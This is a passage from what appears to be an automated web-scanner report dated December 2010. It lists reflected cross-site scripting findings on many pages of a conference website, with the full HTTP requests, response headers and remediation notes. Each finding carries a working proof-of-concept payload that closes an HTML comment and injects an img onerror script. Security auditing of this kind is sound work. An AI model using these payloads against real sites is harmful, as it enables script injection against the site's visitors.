GET /about/what-is-cloud-computing.php/a25a6--><img%20src%3da%20onerror%3dalert(1)>3c8bf8590b1 HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:31:41 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 29080
3.176. http://www.cloudconnectevent.com/cloud-computing-conference/advisory-board.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/cloud-computing-conference/advisory-board.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 68fbc--><img%20src%3da%20onerror%3dalert(1)>afc4296ab7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68fbc--><img src=a onerror=alert(1)>afc4296ab7c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cloud-computing-conference/advisory-board.php/68fbc--><img%20src%3da%20onerror%3dalert(1)>afc4296ab7c HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:30:07 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 30239
3.177. http://www.cloudconnectevent.com/cloud-computing-conference/cloud-economics.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/cloud-computing-conference/cloud-economics.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ab747--><img%20src%3da%20onerror%3dalert(1)>8a559ab01f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ab747--><img src=a onerror=alert(1)>8a559ab01f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cloud-computing-conference/cloud-economics.php/ab747--><img%20src%3da%20onerror%3dalert(1)>8a559ab01f2 HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:27:55 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 41563
3.178. http://www.cloudconnectevent.com/cloud-computing-conference/cloud-industry-summit.php [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 1f1f6--><img%20src%3da%20onerror%3dalert(1)>ee3d39cc0c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1f1f6--><img src=a onerror=alert(1)>ee3d39cc0c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cloud-computing-conference/cloud-industry-summit.php/1f1f6--><img%20src%3da%20onerror%3dalert(1)>ee3d39cc0c9 HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:28:01 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 54087
3.179. http://www.cloudconnectevent.com/cloud-computing-conference/cloudsec.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/cloud-computing-conference/cloudsec.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5e24c--><img%20src%3da%20onerror%3dalert(1)>f2794f21a97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5e24c--><img src=a onerror=alert(1)>f2794f21a97 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cloud-computing-conference/cloudsec.php/5e24c--><img%20src%3da%20onerror%3dalert(1)>f2794f21a97 HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:28:25 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 49961
3.180. http://www.cloudconnectevent.com/cloud-computing-conference/culture-politics-and-governance.php [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 90191--><img%20src%3da%20onerror%3dalert(1)>cbf54a66f2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 90191--><img src=a onerror=alert(1)>cbf54a66f2e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cloud-computing-conference/culture-politics-and-governance.php/90191--><img%20src%3da%20onerror%3dalert(1)>cbf54a66f2e HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:28:21 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 39247
3.181. http://www.cloudconnectevent.com/cloud-computing-conference/data-and-storage.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/cloud-computing-conference/data-and-storage.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8f497--><img%20src%3da%20onerror%3dalert(1)>75427e9dd5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8f497--><img src=a onerror=alert(1)>75427e9dd5a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cloud-computing-conference/data-and-storage.php/8f497--><img%20src%3da%20onerror%3dalert(1)>75427e9dd5a HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:28:47 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 37131
3.182. http://www.cloudconnectevent.com/cloud-computing-conference/design-patterns.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/cloud-computing-conference/design-patterns.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 29898--><img%20src%3da%20onerror%3dalert(1)>645fd227004 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 29898--><img src=a onerror=alert(1)>645fd227004 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cloud-computing-conference/design-patterns.php/29898--><img%20src%3da%20onerror%3dalert(1)>645fd227004 HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:28:52 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 40160
3.183. http://www.cloudconnectevent.com/cloud-computing-conference/devops-and-automation.php [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 62edf--><img%20src%3da%20onerror%3dalert(1)>9961a7af16d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62edf--><img src=a onerror=alert(1)>9961a7af16d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cloud-computing-conference/devops-and-automation.php/62edf--><img%20src%3da%20onerror%3dalert(1)>9961a7af16d HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:29:08 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 33499
3.184. http://www.cloudconnectevent.com/cloud-computing-conference/event-schedule.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/cloud-computing-conference/event-schedule.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a886b--><img%20src%3da%20onerror%3dalert(1)>2a78e25b19c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a886b--><img src=a onerror=alert(1)>2a78e25b19c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cloud-computing-conference/event-schedule.php/a886b--><img%20src%3da%20onerror%3dalert(1)>2a78e25b19c HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:30:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 129041
3.185. http://www.cloudconnectevent.com/cloud-computing-conference/performance-and-monitoring.php [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 1a808--><img%20src%3da%20onerror%3dalert(1)>887d62253e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1a808--><img src=a onerror=alert(1)>887d62253e9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cloud-computing-conference/performance-and-monitoring.php/1a808--><img%20src%3da%20onerror%3dalert(1)>887d62253e9 HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:29:17 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 35471
3.186. http://www.cloudconnectevent.com/cloud-computing-conference/private-clouds.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/cloud-computing-conference/private-clouds.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a4e50--><img%20src%3da%20onerror%3dalert(1)>419370da55c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a4e50--><img src=a onerror=alert(1)>419370da55c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cloud-computing-conference/private-clouds.php/a4e50--><img%20src%3da%20onerror%3dalert(1)>419370da55c HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:29:21 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 36784
3.187. http://www.cloudconnectevent.com/cloud-computing-conference/the-future-of-utility-computing.php [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload dd54a--><img%20src%3da%20onerror%3dalert(1)>14457f7e7ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dd54a--><img src=a onerror=alert(1)>14457f7e7ee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cloud-computing-conference/the-future-of-utility-computing.php/dd54a--><img%20src%3da%20onerror%3dalert(1)>14457f7e7ee HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:29:11 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 33904
3.188. http://www.cloudconnectevent.com/cloud-computing-conference/track-chairs.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/cloud-computing-conference/track-chairs.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 26edf--><img%20src%3da%20onerror%3dalert(1)>199746e5806 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 26edf--><img src=a onerror=alert(1)>199746e5806 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cloud-computing-conference/track-chairs.php/26edf--><img%20src%3da%20onerror%3dalert(1)>199746e5806 HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:29:52 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 47411
3.189. http://www.cloudconnectevent.com/cloud-computing-conference/workshops.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/cloud-computing-conference/workshops.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 46343--><img%20src%3da%20onerror%3dalert(1)>23b7df10469 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 46343--><img src=a onerror=alert(1)>23b7df10469 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cloud-computing-conference/workshops.php/46343--><img%20src%3da%20onerror%3dalert(1)>23b7df10469 HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:30:01 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 46826
3.190. http://www.cloudconnectevent.com/contact-us.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/contact-us.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 197e2--><img%20src%3da%20onerror%3dalert(1)>7ce8abd1501 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 197e2--><img src=a onerror=alert(1)>7ce8abd1501 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /contact-us.php/197e2--><img%20src%3da%20onerror%3dalert(1)>7ce8abd1501 HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:32:02 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 33513
3.191. http://www.cloudconnectevent.com/expo/event-testimonials.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/expo/event-testimonials.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e64a7--><img%20src%3da%20onerror%3dalert(1)>c0d6bf373a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e64a7--><img src=a onerror=alert(1)>c0d6bf373a3 in the application's response.
